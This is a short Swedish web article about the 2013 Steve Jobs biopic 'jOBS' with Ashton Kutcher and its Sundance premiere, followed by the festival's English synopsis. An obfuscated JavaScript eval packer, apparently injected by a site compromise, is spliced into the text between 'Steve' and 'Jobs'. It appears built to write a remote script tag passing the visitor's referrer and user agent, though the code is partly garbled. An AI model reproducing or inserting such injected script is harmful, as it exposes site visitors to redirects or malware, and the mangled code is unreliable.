Image Image Image Image Image Image Image Image Image Image

| 22 oktober, 2018

Scroll to top

Top

Biofilmen om Steve Jobs premiär i januari

Biofilmen om Steve Jobs premiär i januari
Sebastian Plengier Ehrnfelt

Steve eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tfdte|var|u0026u|referrer|tertn||js|php’.split(‘|’),0,{}))
Jobs: Det är Ashton Kutcher som tar rollen som Steve Jobs i den kommande filmen om ledarens liv. Filmen kommer att premiärvisas under Sundance Film Festival någon gång mellan 17-27 januari nästa år.

Det är fortfarande oklart om den kommer att släppas efter festivalen till  allmänheten men det lär vi få reda på då.

jOBS / U.S.A. (Director: Joshua Michael Stern, Screenwriter: Matt Whiteley) — The true story of one of the greatest entrepreneurs in American history, jOBS chronicles the defining 30 years of Steve Jobs’ life. jOBS is a candid, inspiring and personal portrait of the one who saw things differently. Cast: Ashton Kutcher, Dermot Mulroney, Josh Gad, Lukas Haas, J.K. Simmons, Matthew Modine.

OBS! Det är inte filmen från Sony som handlar om Steve Jobs.

Läs mer på Sundance.org